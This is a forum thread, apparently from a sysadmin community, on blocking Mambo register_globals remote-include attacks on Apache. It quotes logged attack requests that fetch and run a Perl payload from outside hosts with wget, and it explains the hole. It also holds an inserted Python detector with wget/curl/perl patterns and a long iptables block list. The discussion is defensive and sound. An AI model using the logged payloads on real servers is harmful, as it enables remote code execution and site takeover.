Re: Securing Apache with Perl

 
Geoff Wild
Honored Contributor

Securing Apache with Perl

How to stop hackers from trying this:

81.7.96.53 - - [27/Mar/2006:08:49:47 -0800] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gothicangel.photojerk.com/~what/cmd.txt?&cmd=cd%20/tmp;wget%20http://gothicangel.photojerk.com/~what/mambes.txt;perl%20mambes.txt;rm%20-rf%20mambes.txt ? HTTP/1.0" 200 16
216.70.72.160 - - [27/Mar/2006:10:52:10 -0800] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ns.powernet-bg.net/maps/cmd.txt?&cmd=cd%20/tmp;wget%20http://ns.powernet-bg.net/maps/but2.txt;perl%20but2.txt;rm%20-rf%20but2.txt ? HTTP/1.0" 200 16
148.222.11.6 - - [27/Mar/2006:21:50:58 -0800] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.56.218.236/cmd.txt?&cmd=cd%20/tmp;wget%20http://81.56.218.236/mambes.txt;mv%20mambes.txt%20mambis.txt;perl%20mambis.txt;rm%20-rf%20mambis.txt ? HTTP/1.0" 200 16

I already block an extensive list of ip's in iptables...

Rgds...Geoff
Proverbs 3:5,6 Trust in the Lord with all your heart and lean not on your own understanding; in all your ways acknowledge him, and he will make all your paths straight.
Ivan Ferreira
Honored Contributor

Re: Securing Apache with Perl

You can secure your system, but you can't prevent them from trying. You can configure Perl taint mode and Apache in a chroot jail. And maybe you could use swatch.

The swatch tool monitors patterns in log files and, if a pattern is found, an action is executed. You can use swatch to automatically create iptables rules for these kinds of requests.
Por que hacerlo dificil si es posible hacerlo facil? - Why do it the hard way, when you can do it the easy way?
Geoff Wild
Honored Contributor

Re: Securing Apache with Perl

Is there any way to prevent someone from calling perl?

For example - what if I moved perl into a different directory - one that isn't in PATH...then modify perl scripts to have that new location?

Rgds...Geoff
Steven E. Protter
Exalted Contributor

Re: Securing Apache with Perl

Shalom Geoff,

Are you sweeping the log with an automated cron script for this activity and then adding it to iptables? That could help.

This is very similar to the proxy redirect problem I encountered in the US for months.

The eventual solution was to locate the servers behind a hardware firewall solution that limited the inbound ports and protected against overloads on supposedly secure ports.

I'd like to see Ivan's procedure in more detail however.

SEP
Steven E Protter
Owner of ISN Corporation
http://isnamerica.com
http://hpuxconsulting.com
Sponsor: http://hpux.ws
Twitter: http://twitter.com/hpuxlinux
Founder http://newdatacloud.com
Steven E. Protter
Exalted Contributor

Re: Securing Apache with Perl

Geoff, I'm obviously missing something. Where in the log does it show perl is being called on the local machine?

SEP
Geoff Wild
Honored Contributor

Re: Securing Apache with Perl

Right here - first it does a wget, then executes perl on it, then rm's it:

http://81.56.218.236/cmd.txt?&cmd=cd%20/tmp;wget%20http://81.56.218.236/mambes.txt;mv%20mambes.txt%20mambis.txt;perl%20mambis.txt;rm%20-rf%20mambis.txt ?

Rgds...Geoff
Ivan Ferreira
Honored Contributor

Re: Securing Apache with Perl

For more information see:

http://www.cncode.com/Download.asp?ID=1589&URL=http://downloads38.cncode.com/book/Server/HardeningApache.rar
Bill Thorsteinson
Honored Contributor

Re: Securing Apache with Perl

If you don't enable CGI mechanisms in Apache they can't call perl. It looks like you may have PHP enabled.

You can restrict the directories that CGI will run in as well.

The user Apache runs as should NOT be able to write any files or directories in the paths available to Apache. The exception would be any files required to be written by any CGI scripts you do enable. This should be a limited number of directories.

If index.php does not handle any parameters then the references to perl are meaningless. Remove maps/cmd.txt.

Check index.php for code similar to cmd.txt and disable it.

Check the documentation at apache.org for more details.



Bill Thorsteinson
Honored Contributor

Re: Securing Apache with Perl

You could consider restricting execution of perl so that only root and one group other than that of the Apache server can run it. This would prevent it from being run by CGIs running under Apache.
Stuart Browne
Honored Contributor

Re: Securing Apache with Perl

Wow, Mambo exploit! Haven't seen this one before!

What version of Mambo is it?
One long-haired git at your service...
Stuart Browne
Honored Contributor

Re: Securing Apache with Perl

Ok, let me expand on this thought a bit.

The '/index.php' is being passed various arguments:

_REQUEST[option]=com_content
_REQUEST[itemid]=1
GLOBALS=
mosConfig_absolute_path=http://.....

As PHP's 'register_globals = on', it's expanding _REQUEST[option] to the PHP variable "$_REQUEST['option']", which is then getting interpreted by the Mambo code as if it should be there, over-writing anything that Mambo would put in there normally.

This is also what's over-writing the localized '$mosConfig_absolute_path'. I would assume that this is fopen()'d at some point, which is why this exploit comes even close to working.

So, short fix?

Try setting 'register_globals = off' in your 'php.ini'. You'll need to double check the operation of your PHP routines after this though, as any place you've relied upon this automatic translation of POST/GET variables into PHP $variables will break (should move to $_REQUEST['name'] instead).
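Ivan's swatch suggestion and Stuart's explanation above come down to recognising one request shape: `_REQUEST[...]` and `GLOBALS` keys that only do anything when register_globals lets the query string write into PHP's variables, a config path such as mosConfig_absolute_path pointed at a remote URL (the remote include), and a cmd parameter carrying a shell pipeline. The script below is an added example, not code from this thread, from swatch or from Mambo. It scans Apache combined-log lines for those three indicators and emits one host-specific iptables DROP per offending source, which is what a swatch action would run. The sample log is constructed from two of the lines Geoff posted plus one benign request; the /32 form and `iptables -I INPUT` are my choices, not the thread's.

```python
"""Spot Mambo/Joomla register_globals remote-include probes in an Apache
access log and turn the sources into iptables DROP rules, the way a
swatch action would.  Added example; not code from the thread or swatch."""
import re
from urllib.parse import unquote_plus

# Constructed sample: two of the lines Geoff posted plus one benign hit.
SAMPLE_LOG = """\
81.7.96.53 - - [27/Mar/2006:08:49:47 -0800] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gothicangel.photojerk.com/~what/cmd.txt?&cmd=cd%20/tmp;wget%20http://gothicangel.photojerk.com/~what/mambes.txt;perl%20mambes.txt;rm%20-rf%20mambes.txt ? HTTP/1.0" 200 16
10.0.0.5 - - [27/Mar/2006:09:00:00 -0800] "GET /index.php?option=com_content&Itemid=1 HTTP/1.0" 200 5120
148.222.11.6 - - [27/Mar/2006:21:50:58 -0800] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.56.218.236/cmd.txt?&cmd=cd%20/tmp;wget%20http://81.56.218.236/mambes.txt;mv%20mambes.txt%20mambis.txt;perl%20mambis.txt;rm%20-rf%20mambis.txt ? HTTP/1.0" 200 16
"""

# Apache combined/common log prefix; the request target is matched lazily
# so the trailing " ?" the scanner sends still lands inside it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3}) \S+')

# Keys that only do anything when register_globals lets the query string
# write into PHP's superglobals.
SUPERGLOBAL_RE = re.compile(
    r'^(?:_REQUEST|_GET|_POST|_COOKIE|_SERVER|_FILES|GLOBALS)(?:\[|$)')
# A path-like config variable that names a remote server is the include step.
PATHLIKE_RE = re.compile(r'path|dir|root|include', re.IGNORECASE)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Shell separators or downloader/interpreter names inside a "cmd" value.
SHELL_RE = re.compile(r'[;|`]|\b(?:wget|curl|lynx|perl|sh)\b')


def split_query(target):
    """Decode the query string by hand: parse_qsl on older Pythons also
    splits on ';', which would shred the injected command."""
    query = target.partition("?")[2]
    pairs = []
    for chunk in query.split("&"):
        key, _, value = chunk.partition("=")
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def analyse_request(target):
    """Reasons this request looks like a register_globals RFI probe
    (an empty list means it looked clean)."""
    reasons = []
    for key, value in split_query(target):
        if SUPERGLOBAL_RE.match(key):
            reasons.append(f"superglobal injection via {key}")
        if PATHLIKE_RE.search(key) and REMOTE_URL_RE.match(value):
            reasons.append(f"remote include: {key}={value}")
        if key.lower() in ("cmd", "command", "exec") and SHELL_RE.search(value):
            reasons.append(f"shell command in {key}: {value}")
    return reasons


def scan_log(text):
    """(source ip, status, reasons) for every line that trips a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = analyse_request(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), int(m.group("status")), reasons))
    return hits


def iptables_rules(hits):
    """One /32 DROP per offending source, deduplicated, first seen first."""
    seen = []
    for ip, _status, _reasons in hits:
        if ip not in seen:
            seen.append(ip)
    return [f"iptables -I INPUT -s {ip}/32 -j DROP" for ip in seen]


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, status, reasons in found:
        print(f"{ip} (HTTP {status}): " + "; ".join(reasons))
    print("\n".join(iptables_rules(found)))
```

Two caveats when wiring this into swatch or cron. The 200 on those lines means Apache had already answered before anything could read the log, so blocking from the log only trims repeat visits; the actual fix is register_globals off plus the vendor patch. And dropping whole /24s, as the rule list later in this thread does, also cuts off every innocent neighbour of one compromised host, which is why the example emits /32s.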
Steven E. Protter
Exalted Contributor

Re: Securing Apache with Perl

Got it.

If you shut down cgi, your web server will lose functionality. You can afford to disable wget however and that will stop this particular attack.

After that you have to harden apache against this stuff and please share, because you are not the only one undergoing this attack.

I think also your firewall might not be secure and you should post the configuration here or in another thread.

SEP
Geoff Wild
Honored Contributor

Re: Securing Apache with Perl

This exploit doesn't affect current Mambo (I'm running 4.5.3h)...

register globals is off.

To make the server safer, I will chroot apache (my dns is already...)...

As far as firewall - well...it is fairly large - but I attached as a txt file.

# wc iptables
1347 9177 52861 iptables

Also - I moved wget somewhere else...as only I need it...

perl taint mode doesn't apply - as the hackers aren't calling it that way...

All good info - points forthcoming - so be patient :)



Thanks...Geoff

Steven E. Protter
Exalted Contributor

Re: Securing Apache with Perl

I would like to see what doc you use to chroot apache. I have two servers waiting for production and should obviously make this happen.

0 for this.

Shmuel
Geoff Wild
Honored Contributor

Re: Securing Apache with Perl

Currently, I'm looking at this one:

http://www.faqs.org/docs/securing/chap29sec254.html

Rgds...Geoff
Stuart Browne
Honored Contributor

Re: Securing Apache with Perl

I'm assuming you've applied the patch that's listed on the Mambo page? ( http://mamboxchange.com/frs/?group_id=5 )

Geoff Wild
Honored Contributor

Re: Securing Apache with Perl

chroot - has become really complicated...

I also use mysql - so that throws another wrinkle - haven't been able to get it all together...

One day, there will be a way to accomplish what I want...

Unfortunately, I don't have a lot of time...

For now, I have moved wget outside of any PATH - and it can't be guessed easily..

Also, I added some more to my iptables:


# morons trying tool hack
# first ones are web servers with tool on them
$IPT -A INPUT -p ALL -s 38.119.100.0/24 -j DROP
$IPT -A INPUT -p ALL -s 59.106.19.0/24 -j DROP
$IPT -A INPUT -p ALL -s 198.78.81.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.39.58.0/24 -j DROP
# here are the hacker machines
$IPT -A INPUT -p ALL -s 12.178.213.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.209.99.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.21.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.232.75.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.80.96.0/24 -j DROP
$IPT -A INPUT -p ALL -s 58.26.138.0/24 -j DROP
$IPT -A INPUT -p ALL -s 58.69.172.0/24 -j DROP
$IPT -A INPUT -p ALL -s 59.120.225.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.195.151.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.91.96.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.100.60.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.1.211.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.108.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.141.50.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.141.52.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.141.54.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.141.58.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.148.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.149.140.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.149.228.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.149.36.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.154.233.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.204.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.211.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.225.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.228.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.229.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.230.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.242.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.2.78.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.212.81.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.242.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.252.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.64.17.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.70.54.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.73.211.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.75.148.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.75.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.75.177.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.75.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.75.221.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.87.177.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.97.117.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.99.179.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.119.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.14.74.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.207.132.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.27.28.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.38.12.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.39.29.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.62.190.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.71.140.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.76.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.81.34.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.111.165.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.12.236.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.174.146.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.175.135.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.254.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.254.36.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.254.53.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.75.190.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.111.211.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.132.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.134.41.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.152.98.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.180.195.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.197.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.197.177.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.208.60.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.216.159.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.221.65.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.226.242.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.227.127.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.232.134.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.240.188.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.240.226.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.240.238.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.246.218.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.36.233.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.45.10.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.88.106.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.96.219.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.98.166.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.98.196.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.109.217.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.109.23.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.18.166.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.18.40.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.19.209.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.41.199.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.79.144.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.146.208.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.167.33.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.178.157.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.178.161.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.10.136.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.159.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.16.197.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.16.214.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.17.124.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.20.16.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.56.201.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.60.115.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.61.30.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.64.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.64.37.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.66.61.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.67.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.72.153.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.72.187.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.72.225.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.81.39.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.93.134.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.94.41.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.231.140.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.231.162.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.60.85.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.84.204.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.84.205.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.85.133.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.85.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.86.48.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.87.45.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.87.79.0/24 -j DROP
$IPT -A INPUT -p ALL -s 72.21.44.0/24 -j DROP
$IPT -A INPUT -p ALL -s 72.29.79.0/24 -j DROP
$IPT -A INPUT -p ALL -s 72.3.139.0/24 -j DROP
$IPT -A INPUT -p ALL -s 72.3.235.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.177.117.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.179.151.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.190.249.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.199.13.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.201.172.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.203.213.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.231.85.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.237.132.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.237.145.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.237.152.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.237.24.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.63.235.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.65.162.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.68.90.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.69.84.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.74.144.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.76.61.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.81.122.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.82.18.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.84.64.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.86.174.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.86.200.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.86.91.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.128.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.134.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.136.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.155.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.165.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.170.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.177.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.182.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.188.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.174.30.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.174.48.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.183.239.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.196.47.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.240.177.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.241.238.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.30.206.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.90.33.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.92.213.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.93.136.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.94.11.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.100.3.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.103.128.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.112.90.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.113.204.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.119.205.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.238.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.244.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.248.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.251.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.27.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.38.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.41.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.8.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.192.74.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.192.84.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.195.155.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.208.35.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.220.2.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.221.48.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.70.196.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.76.51.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.77.71.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.102.225.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.133.127.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.137.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.149.82.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.16.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.170.75.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.17.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.17.237.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.17.252.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.18.172.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.19.254.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.19.92.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.217.72.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.227.41.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.236.200.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.236.223.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.238.19.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.64.220.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.65.25.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.163.160.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.191.60.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.233.156.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.24.21.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.243.244.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.244.10.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.244.1.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.244.131.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.244.6.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.246.242.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.246.245.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.40.21.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.45.67.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.98.148.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.10.211.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.111.4.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.14.216.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.142.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.159.88.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.17.1.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.17.3.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.190.1.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.197.248.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.214.17.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.214.22.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.214.28.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.214.33.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.214.39.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.25.8.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.34.189.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.39.124.0/24 -j DROP
$IPT -A INPUT -p ALL -s 86.109.96.0/24 -j DROP
$IPT -A INPUT -p ALL -s 86.34.150.0/24 -j DROP
$IPT -A INPUT -p ALL -s 86.39.130.0/24 -j DROP
$IPT -A INPUT -p ALL -s 86.43.64.0/24 -j DROP
$IPT -A INPUT -p ALL -s 86.55.7.0/24 -j DROP
$IPT -A INPUT -p ALL -s 87.233.14.0/24 -j DROP
$IPT -A INPUT -p ALL -s 88.80.193.0/24 -j DROP
$IPT -A INPUT -p ALL -s 129.241.152.0/24 -j DROP
$IPT -A INPUT -p ALL -s 130.226.80.0/24 -j DROP
$IPT -A INPUT -p ALL -s 130.89.164.0/24 -j DROP
$IPT -A INPUT -p ALL -s 131.203.76.0/24 -j DROP
$IPT -A INPUT -p ALL -s 137.224.96.0/24 -j DROP
$IPT -A INPUT -p ALL -s 141.44.47.0/24 -j DROP
$IPT -A INPUT -p ALL -s 141.62.98.0/24 -j DROP
$IPT -A INPUT -p ALL -s 143.234.96.0/24 -j DROP
$IPT -A INPUT -p ALL -s 147.202.66.0/24 -j DROP
$IPT -A INPUT -p ALL -s 148.216.6.0/24 -j DROP
$IPT -A INPUT -p ALL -s 155.185.227.0/24 -j DROP
$IPT -A INPUT -p ALL -s 156.63.169.0/24 -j DROP
$IPT -A INPUT -p ALL -s 157.118.21.0/24 -j DROP
$IPT -A INPUT -p ALL -s 158.42.184.0/24 -j DROP
$IPT -A INPUT -p ALL -s 158.75.102.0/24 -j DROP
$IPT -A INPUT -p ALL -s 161.139.114.0/24 -j DROP
$IPT -A INPUT -p ALL -s 161.246.1.0/24 -j DROP
$IPT -A INPUT -p ALL -s 161.53.191.0/24 -j DROP
$IPT -A INPUT -p ALL -s 166.114.248.0/24 -j DROP
$IPT -A INPUT -p ALL -s 171.64.116.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.109.36.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.110.59.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.136.19.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.136.60.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.189.141.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.192.247.0/24 -j DROP
